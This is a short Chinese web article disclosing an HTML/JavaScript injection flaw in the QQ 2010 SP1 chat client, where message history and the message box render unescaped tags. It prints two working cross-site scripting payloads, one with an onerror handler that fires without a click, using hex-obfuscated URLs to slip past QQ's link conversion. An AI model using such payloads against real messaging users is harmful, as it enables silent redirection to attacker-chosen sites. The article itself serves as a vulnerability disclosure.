腾讯QQ2010SP1正式版惊现低级漏洞

 腾讯QQ一向是腾讯主打的产品，意想不到前天发布的QQ2010SP1竟然有如此大漏洞。用户可以随意在消息中使用Javascript、Html，腾讯并没有对此进行有效的屏蔽，如此低级漏洞，在QQ这样的软件中出现实属罕见。

    截止发稿之日起，腾讯还没有对此漏洞给出解决办法，网友只有去下载试用QQ2010正式版来避免此问题。

    点击下载：QQ2010SP1正式版

    首先囧一下：脚本出错还会提示错误

    1、消息记录的Javascript、Html标签没有屏蔽

    2、消息盒子Javascript、Html标签没有屏蔽

    3、小实验

    1、发送代码：<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />

    因为腾讯会自动将url转换，我们必须混淆url才能发送

    4、超牛代码

    <img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

    因为要点击才能触发，想到一个不用点击就能触发的代码。

    5、希望腾讯快点修复，这个漏洞非同小可

    6、本漏洞由TGL发现。